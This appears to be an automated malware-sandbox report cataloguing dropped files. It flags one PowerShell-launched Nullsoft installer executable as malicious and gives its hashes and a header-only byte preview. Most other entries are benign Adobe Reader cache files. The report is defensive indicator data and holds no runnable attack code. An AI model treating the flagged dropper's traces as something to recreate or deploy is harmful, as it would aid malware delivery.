                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):344681
                                                      Entropy (8bit):6.7218967633534605
                                                      Encrypted:false
                                                      SSDEEP:6144:bmOPbtybqh+/fDv9vE520B36t/21/F99OjpiN6:ft2W+nz9s520j999OS6
                                                      MD5:9DCA43CB15D97693D2DE73683804C5C7
                                                      SHA1:3BF61BC542DB16E0A045505C2868CD12CFCAC769
                                                      SHA-256:C3AC750A23FB48EEE9E1CE2D9BD59AADBC190A1DD36AFBDC9F5C39EEB7F87756
                                                      SHA-512:26A0870AE04D5939C410F31B1755D0AE37658921536D6C6A02FA59003B5CF3AD1FC5D4DA919DD1B6D58B451210BD46084E74FD44C8988065FEE78B88EB122549
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.......................................@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...P...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):205
                                                      Entropy (8bit):5.615435108181702
                                                      Encrypted:false
                                                      SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVzu/WhT19hMktu3/iTFJrqzOJkvP5m1:men9YOFLvEWdM9Q9WB1/ltuvi7Z+P41
                                                      MD5:8EB571A2F578FD0D96A664FF6DCDC848
                                                      SHA1:476F14A16F3E125F07346EF58C37B913214F0A85
                                                      SHA-256:C9BF7AD05F4147B30BE46B455182A474DF7A789B9EDEC5C358E3A15F8BA82859
                                                      SHA-512:8F9F8694556972565A3F7F078AC42AF96A3F0EA20F78B7E494313E05D8C1E173871E016896A48E0FD9D1F58A6F788F7D4527BF4497DAA8B6D93BDB4CCC9072DC
                                                      Malicious:false
                                                      Preview:0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js ...u..[/....."#.D...;..A.A..Eo......Z.c.............d.{v.^.G...d.W.:...P..k%..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):174
                                                      Entropy (8bit):5.562019634990087
                                                      Encrypted:false
                                                      SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWVd6tw+/6kxMktR9lXe98fZe/O+/rkwGhkg4m1:mi9NqEYOFLvEkm6u6kxltR9la8Be7YwE
                                                      MD5:0C7D85437346DF79FA20D827D6A7B1C4
                                                      SHA1:D76E07F4FE52B2E795AA1D27EDA8A483ED7E1AA0
                                                      SHA-256:DFFC7E08DDF1D2D1D45F90425955F7B73621997C0337D5D2F1E799E891A382AE
                                                      SHA-512:87BCDECBEE19FD6B77AD7C7067D6509340D3D87F3058B68A2240A7DC33C2700C2ADD64E54DB91E9C25F0FCB024E8CE5943280B26CA384074A5A1DB4FBEAD184F
                                                      Malicious:false
                                                      Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .';_..[/....."#.D=)y.;..A.A..Eo......O..B.........1.x.'.vI..*|Z..o...+.4....0..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):246
                                                      Entropy (8bit):5.563292870042341
                                                      Encrypted:false
                                                      SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhuCcuBltL9/let/RlUoSjGY1:DyeRVFAFjVFAFduD1fetZlUo6
                                                      MD5:FC370D4CFE8EB9263ABD652CE96CD524
                                                      SHA1:998911643E005CEBB19C1DA98257AD4B256319DB
                                                      SHA-256:F169D6934ADC4C5C1AC2D4CB3CD8DC74B4024923E0D866C6665E92F48FD80CA4
                                                      SHA-512:5E845E672FC50834EA5D7502242ED74B94C1AB5FCE0E935606E3F023380E11BAE453D25CAB4CDC8D454580DF454769225C2472923FA1569D1CAF3285F432544E
                                                      Malicious:false
                                                      Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ..gt..[/....."#.D$..;..A.A..Eo.......U."..........hvDO.N.t@.....n.*...... ....A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):232
                                                      Entropy (8bit):5.681248251680065
                                                      Encrypted:false
                                                      SSDEEP:6:mNtVYOFLvEWdFCi5RsID/d10hltbluiWulHyA1:IbRkiDTQRljWus
                                                      MD5:741090CB80D4E1D1D648A9CA7ADF34CB
                                                      SHA1:6D4A483F77609BE7BC4921F938AEB066813597B0
                                                      SHA-256:7F1773245725284E3CA29CF9F2FC3864C0F9B2AC0A74ED3316D0BCF6A1D97BA7
                                                      SHA-512:7B409E7A2B82547A2FA181D23BE4319E0CC716EBD3CE146B7F50100A0DC357C04D6C79899C9486903CE287D4BA407375AC9C9C60FCF0D093DB3D8D1402636A78
                                                      Malicious:false
                                                      Preview:0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js ......[/....."#.D&.7.;..A.A..Eo......1.I...........8 P..a...R..Y....7.@..2Dm{..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):210
                                                      Entropy (8bit):5.55530404996288
                                                      Encrypted:false
                                                      SSDEEP:6:m+yiXYOFLvEWd7VIGXVutTr2/ltcVyh9PT41:pyixRuPr29+V41T
                                                      MD5:D1A81CC38CF4FF4AB53F3C0A7CC2934D
                                                      SHA1:438F9E6E49B4795ACD3DB3BAD86F56BA6B434407
                                                      SHA-256:FEC0BE7C1BC6F2D6AB6E77555CCB0F0E7121B1BDD085E10EB3CBD08065F1B7F2
                                                      SHA-512:211245351FCD00085896584860D983197F262FED1A4AC061AB820ECB0CCFAC084BF7DA0C7673AF6896683A699EEEA41D49B4872B18231656E7519E82167244FB
                                                      Malicious:false
                                                      Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ...t..[/....."#.D...;..A.A..Eo.......C..........k.Q.....-_..y.....O...>..1....A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):216
                                                      Entropy (8bit):5.599634536617189
                                                      Encrypted:false
                                                      SSDEEP:6:mvYOFLvEWdhwjQfXlY1ltplV3ZIl6P41:0RhkGM5BZ
                                                      MD5:45034E045BE7B0B72AC2BF77F61E91B5
                                                      SHA1:EB1681A59CC9C3FDF671C2116A5C26243BBA18EA
                                                      SHA-256:8A2E6B498D754934C1B99B3AEC696B665A22E7CEC3E2F014F3E4D671B3EFD50C
                                                      SHA-512:44C78442C06772333774D2B99813C485F265AAEB2AFF5666ADC851C03CF531EA745957253D570FFC65146B2321EA1E62CD44A831523BDD386DFAABE958E3D8D1
                                                      Malicious:false
                                                      Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js .i~n..[/....."#.D$...;..A.A..Eo.......DM..........].>....uUf..N...k......c..l.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):209
                                                      Entropy (8bit):5.552000627276196
                                                      Encrypted:false
                                                      SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuVStJv/lk6/1MktecyxMtv9EWy:mJYOFLvEWdGQRQOdQh1F/1lteD6g1
                                                      MD5:F145385D95965B7C9A6C995132DFE2E9
                                                      SHA1:3014B8B7C81AF1730A029E2C54CD5ED51EBECEE0
                                                      SHA-256:5B2707D5F1E35DBDC72067EB26313C55C63DB98BF12F0D26C253709B546E8B9D
                                                      SHA-512:0AE37258A098A6CE52E594B8011B0F02B0381845634ACFC39832C1E1F2CBF6EB8F0425238B9EE55A6C785E4AF1ADE95E3FDFE15B829E56DF6DF0A645F64BEEB5
                                                      Malicious:false
                                                      Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js ...u..[/....."#.D...;..A.A..Eo......A..F..........c..y/L....|y.n..C/I.....X7-ne.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):179
                                                      Entropy (8bit):5.561828965579524
                                                      Encrypted:false
                                                      SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVVu+Wfse4qMktylltVQMWqg4nRb7om5m1:mOYOFLvECMLg+WEe4qlty/cuR/41
                                                      MD5:907302A6EB9CC1D751AED9EAA538B165
                                                      SHA1:220C97768E62D211A0899FC539ACB417DC94C6B0
                                                      SHA-256:6DF523D71BF70531A897130FC4312DB2922684599E93054F3F88AE493092C27F
                                                      SHA-512:34233508E1A97E7E2547B9536F7EF46A2E02AF604F8786EC3EAE5FAB447B3DCF38A2E2C2BF275890DBC3D24BB324A9A9C3341DCBF105EE3AE40D083CB6BD120D
                                                      Malicious:false
                                                      Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js ..>_..[/....."#.D.sz.;..A.A..Eo.........f.........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):212
                                                      Entropy (8bit):5.641556119309619
                                                      Encrypted:false
                                                      SSDEEP:6:mGpYOFLvEWdzAAuAYsp9hltBGm0bbsIDMGH41:XfRM2/j/VKsIZ
                                                      MD5:A767045D5B2EFA38F7B20130DAB01E60
                                                      SHA1:63AD009B03D3788BF18E9452F6690415DA4A1970
                                                      SHA-256:4C25ACC9272F4DD9731EA6649F96BB845BC93C747BB753D0B189185733713BA7
                                                      SHA-512:2188AC6085D4E5F4EB9D577DA87B3ECFE601C2746784AAA04995FD5BD1101716C491FE35E1AC94CA02591C4E3C47325A9EBC179D2305A9C249209E2F88EE1172
                                                      Malicious:false
                                                      Preview:0\r..m......T....,.^...._keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/selector.js ......[/....."#.D&...;..A.A..Eo........M...........`.....^....L>..Xa./......C.y.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):214
                                                      Entropy (8bit):5.558187660796835
                                                      Encrypted:false
                                                      SSDEEP:6:m4fPYOFLvEWdtuAt/2ltW3by0zBUKSAA1:pRj1cWb
                                                      MD5:9537C763355C2F89979259BF07E6E939
                                                      SHA1:9B7496AF5312F95D6FF71D03A48B3C59C86A95D6
                                                      SHA-256:09B86083901E9B47C6F8F8149C1E7991A983BA672E285688B7AC51299E9C6B86
                                                      SHA-512:80E0433B79859530E70112DD8038BE33B26E6E91BB9A60CA35D139CD9B56F1F266EBD9DF6C4A86186B088EF25C4C97C61A1A21FB75FB3DD8FF2EB3288DB11EDA
                                                      Malicious:false
                                                      Preview:0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js ..2v..[/....."#.D@O.;..A.A..Eo......1...........Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):177
                                                      Entropy (8bit):5.552814515306035
                                                      Encrypted:false
                                                      SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvbwKl/sWe7xMkt2lcd1dn76KohyP5m1:md4HXXYOFLvEjMSWFvMusWkxlt2GjUd1
                                                      MD5:80A22889051F27ADB4FA877159932724
                                                      SHA1:0DC47F9155BFF15323D3A20BAE3914E811D8A728
                                                      SHA-256:7417F91D16FF603FFF6C6F1E8747E1E6441D3935CB03A20D85063ECCA1159D2F
                                                      SHA-512:7A0F55BD08B8BBCB524D558A6290EAABF4C274588107CDA6DF1D8AE887F61C0730324F741579F9F7FA9782B21FFDBAD9AE0B4B6B98B34DA5A585454FEF791682
                                                      Malicious:false
                                                      Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js .w<_..[/....."#.D.@z.;..A.A..Eo...................PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):187
                                                      Entropy (8bit):5.54791009196045
                                                      Encrypted:false
                                                      SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLI1DtMktH/lRUPqf9tsDMaPV44m1:mkl9YOFLvEWsfOLODtltHQPqVyM+VY1
                                                      MD5:80AB002DAE622B567134D05EE97583DD
                                                      SHA1:88BECC811569D533F9E946A67F13BFE0B37414FD
                                                      SHA-256:3C145596B1C9B0FF47DC501FB724FEC0E3B2E9C0856172AF5802310F507302F4
                                                      SHA-512:A55152AA31EF4428FD08EDFE2FA2364E63C94C7D80E2FE3767DB357DE855D6B14CA1CDF4B11CCABC2DC666651337DBB980F4BC75A3D9CD07FDD668D94460B64F
                                                      Malicious:false
                                                      Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ...k..[/....."#.D#...;..A.A..Eo....................q.O...j....._y..L^z...?..@N..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):244
                                                      Entropy (8bit):5.613910456400511
                                                      Encrypted:false
                                                      SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyarrlt+twSeKaT9pr1:URVFAFjVFAFvrZ0twSeKaTL
                                                      MD5:C7A7C0C1A9175011194F623A12C1A741
                                                      SHA1:04F47E902B0504DF9AE34F4F9E5A5B2229A537A2
                                                      SHA-256:A9057D79FB063412DC1AF33D190E747FC93907BD6BE2C2F8737EBE3EDA7FA79D
                                                      SHA-512:CD62C4E4D5F9ACC917A43B20290A009278A1134D115BBCACABFECD1DE13FA82DFE1EB3F564310BE5F692135E1E0A1A2ED41A0067A885F9C696B3560106BA05E9
                                                      Malicious:false
                                                      Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js .L.u..[/....."#.D:..;..A.A..Eo.......................H...{...2../.k`..r4.C. .A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):210
                                                      Entropy (8bit):5.565992646892994
                                                      Encrypted:false
                                                      SSDEEP:6:mq9YOFLvEWdzAHdQ5O/thU9hlto9yt5GFCaa+41:NRMHdGO1hkjK9yt5Gda+
                                                      MD5:EADAEF14D676771DB0B64D4C2E865E2E
                                                      SHA1:3ADB9C6D2A086B9AEBADEB70DC9FF849F469B6E3
                                                      SHA-256:8029CCF0797A455976F5342C36CFBA63722F818886DF61F34A38D5240EF3A990
                                                      SHA-512:A613D8DE0642DD5901F03F88D93B20397F918E4FA24C81AD597854795A2EFC0FD67D6EAFA03BE8649F2508A4FBBA6907C13885692E5B1658F2DA498725FAA073
                                                      Malicious:false
                                                      Preview:0\r..m......R....L......_keyhttps://rna-resource.acrobat.com/static/js/plugins/walk-through/js/plugin.js ../...[/....."#.DK...;..A.A..Eo.......\{............G.3D.....Q.g0...._.Q.........A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):211
                                                      Entropy (8bit):5.504784635512068
                                                      Encrypted:false
                                                      SSDEEP:6:ms2VYOFLvEWdvBIEGdeXuNtu8p/lt711:BsR2Esej8p9
                                                      MD5:EB634ACD606F18724B818EBCA8DB8E86
                                                      SHA1:3C3D5E7A716228B3AA80A32FBF179ED0D7091285
                                                      SHA-256:A5C0EC4C2DB8D248F13035A8E02BB766C9C337D0879CC94E490D26F0B3C31DCA
                                                      SHA-512:69DA94D8DBEC16D5440E246A13D07E22C2E5D680E67DAA57B1F3275D5CBF3599CFBEC51602C3BF11F3C3F68FA08951ADB7CA1E85193A55E5E53050A5ED9F669C
                                                      Malicious:false
                                                      Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js ...t..[/....."#.D.U.;..A.A..Eo........s..........A.o]@r..Q.....<w.....].n\....A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):202
                                                      Entropy (8bit):5.661499283555182
                                                      Encrypted:false
                                                      SSDEEP:6:maVYOFLvEWdwAPCQFlku/ltYLxm7OhKlvA1:RbR16o3yxmJ
                                                      MD5:68B269179F80BED0DABD7D963EDF7E5B
                                                      SHA1:BEA903BFEED56F3DBF428BA7F0D64E864B0EF4E2
                                                      SHA-256:D2FB3B1A093BFEDD85CB86015ABEDD9C5C939CF91E3BF3C234D2897D9F49E87C
                                                      SHA-512:4060A07EBCD261A62944052BE8EFF6F662A61A54F7C5E3A8A11C05B23956180C8EC6A72A78F1FFE138AF52EBCC9C0A9919470A437D5C7EF7A91CE5B0659137AC
                                                      Malicious:false
                                                      Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ...n..[/....."#.D`...;..A.A..Eo....................4T].....Tw.....(..b...EO....9.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):211
                                                      Entropy (8bit):5.58068990769692
                                                      Encrypted:false
                                                      SSDEEP:6:ms2gEYOFLvEWdGQRQVu07t77tlthVdFt1:B2geRHRQ/7t77f3
                                                      MD5:1196FCE4D11D87511641271713F2F847
                                                      SHA1:09ECC366FE7C4738A913AE81E879F1811CA206E9
                                                      SHA-256:13A3D1DB77A244008E44E71CFF103D53FED3C1926C4C0E20F292808094E447D9
                                                      SHA-512:B0B1E64A6C2A04D2BE5BF58254BA7CABF869915EB202487541EBE63F96826AAC98FEB6E0D7B0D15A80213ED8D97C7F12C486B4781F29F576CEA05D0D7C526203
                                                      Malicious:false
                                                      Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..t..[/....."#.D...;..A.A..Eo..................@..{o]...9o|..qY....T....{..u.b..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):206
                                                      Entropy (8bit):5.6065286767496625
                                                      Encrypted:false
                                                      SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuVgll3PeThMktB/gEnNWQ1SUm1:mzyEYOFLvEWdrIOQjllfYltiEt1S/1
                                                      MD5:366A37F9DF48408161BF351EB88D93E9
                                                      SHA1:DD68CED1C0526B4BBEBBF26B2D80BEEEAFC9BEB7
                                                      SHA-256:A3002DAF7EADC4E4A625142FAC7D639FD5497FB7AA084D9AEDFB53312CD82087
                                                      SHA-512:70CD74CED6DECCC44CB38A5A52AAD568BEC1B7D18281A1FEFE4B9CE3810645E47CAFF8964AFCA47E410904AF21A53CD8E57CE424296D789604D2251597CE1969
                                                      Malicious:false
                                                      Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ...l..[/....."#.D....;..A.A..Eo........N..........t\a......x5.'OuE.C..@......x..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):218
                                                      Entropy (8bit):5.588586135103785
                                                      Encrypted:false
                                                      SSDEEP:3:m+lKcv8RzYOCGLvHkWBGKuKjXKoyNH/KPWFvBtl7ouu/MktP1lwJNqww6U+5m1:mnYOFLvEWdhwyuJlE/ltP1lwrqwK+41
                                                      MD5:B4EE9C8B2C534E1E80E528DAC6AC6BD8
                                                      SHA1:2F9232B1E0EC2C13B8EE349904679D29E5D3B6F3
                                                      SHA-256:B6869FDFC22FEDB9947DA1B80A1DC39CA52392E278DCB544C9B57960E6BDCCBA
                                                      SHA-512:C1E5DF6F3B1A457BA30A8F8A8484665193C48C832103099607565C634D425E48F82463FFE8B30FD2C6EF415109820DDB602E17AE5F4D321CC8F7DB6D5DD821ED
                                                      Malicious:false
                                                      Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js .X.n..[/....."#.D.M..;..A.A..Eo......S.4w...............7...o..a=.98I......(3.$G.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):230
                                                      Entropy (8bit):5.575308504934686
                                                      Encrypted:false
                                                      SSDEEP:6:mYXYOFLvEWdrROk/RJbu/qlllwe4qlte92fO441:/RrROk/wqtrH02fL
                                                      MD5:EEBD9444659A1910A31387BFCCD96210
                                                      SHA1:F1656EF9547293ECAE938B4425D058798E8CDF46
                                                      SHA-256:2262AB165E02A6E615056E3B5C2F0787EE3144075D42D5B747C31EC4A3737620
                                                      SHA-512:187E4F9432686B3B8C97D5CF6DEE16A1B18A9B92077EB3B9E0EAFC19C198B09D1619CC29497B70A1A9B76D4E296C4F138E7FD7EC2C5DF1311DD90AE57073B400
                                                      Malicious:false
                                                      Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js .0.l..[/....."#.Du...;..A.A..Eo......Y.............~..rw.+[....!.)?..f.U..(=.=.A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):186
                                                      Entropy (8bit):5.592869522169312
                                                      Encrypted:false
                                                      SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVnlKtObOz1/MktBKHlRzoIN1OFPL4m1:mmDEYOFLvEWXIlKtOoltBS3zV1QPLr1
                                                      MD5:F591D97A209F4902F4D1DF0EBFE39E6D
                                                      SHA1:429744D24408C2F040913E17AF733DC2E2780EDC
                                                      SHA-256:EF4ABC5E76798EF58EC10B46971DAA18E3E6D2FA8867CD2AB4BF376066327722
                                                      SHA-512:B4212F2F5474CF17C729DF7352D83256A25F7502D642CAD9101365E5EB8896ECCE5FA62D189B0A70D2ACD6996E722CC5F626801B6D643F03EFB2C0CD0D5B764C
                                                      Malicious:false
                                                      Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js ..k..[/....."#.D.~..;..A.A..Eo.......KT...........~]...%s..<...n.f..<.....1#..U..A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):207
                                                      Entropy (8bit):5.5773094566261925
                                                      Encrypted:false
                                                      SSDEEP:6:m52YOFLvEWdMAupBr3x/ltD/MEvsEJ41:zRMd3fHvs
                                                      MD5:349DB52ADD07AC44D72AFD75543066EE
                                                      SHA1:A68CCBE25D40F5F3A818E3C7D105DEB12475B923
                                                      SHA-256:DA587C74B0B2EE82ADD97B42415B0AEBBD69CEFFEEF1B4A82FF360066F0A1612
                                                      SHA-512:1D2E25ECB1DC7D19EAA2211F0160B3C9A60C30D2BEF06D2E7E4D3227995FD05BA05FF0A06B943FA8A6C261F4C40FAE88BAD4146332E0865F19CE86895106EB56
                                                      Malicious:false
                                                      Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ...t..[/....."#.D...;..A.A..Eo......w.............z._a...'.v.......4p3..1.']...A..Eo..................

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0

                                                      Download File
                                                      Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):210
                                                      Entropy (8bit):5.559696566635273
                                                      Encrypted:false
                                                      SSDEEP:3:m+lf1UldA8RzYOCGLvHkWBGKuKjXK9QXAdWKfKPWFvVLJ1tooYMkt/IFoDb7T2/1:mYilPYOFLvEWd8CAdAuZbYltqong1
                                                      MD5:9F01B0F2709E033855ABC86FFAABAD18
                                                      SHA1:95B6360A8C951A2A3882245B3129DC3E37B0FBAA
                                                      SHA-256:E331069B6E30BA65AC7F317A5B480DF4E3D8A088ED1D2C5055B9B8186D2D7FE9
                                                      SHA-512:03B855CAA122A32206D750A0F14BD400262BEA073666BC735FD00EF5DCD12FC36F2DFD64132FEF6CF746338BB116DF39383D655EEF5EB500BFF529E544268F2B
                                                      Malicious:false
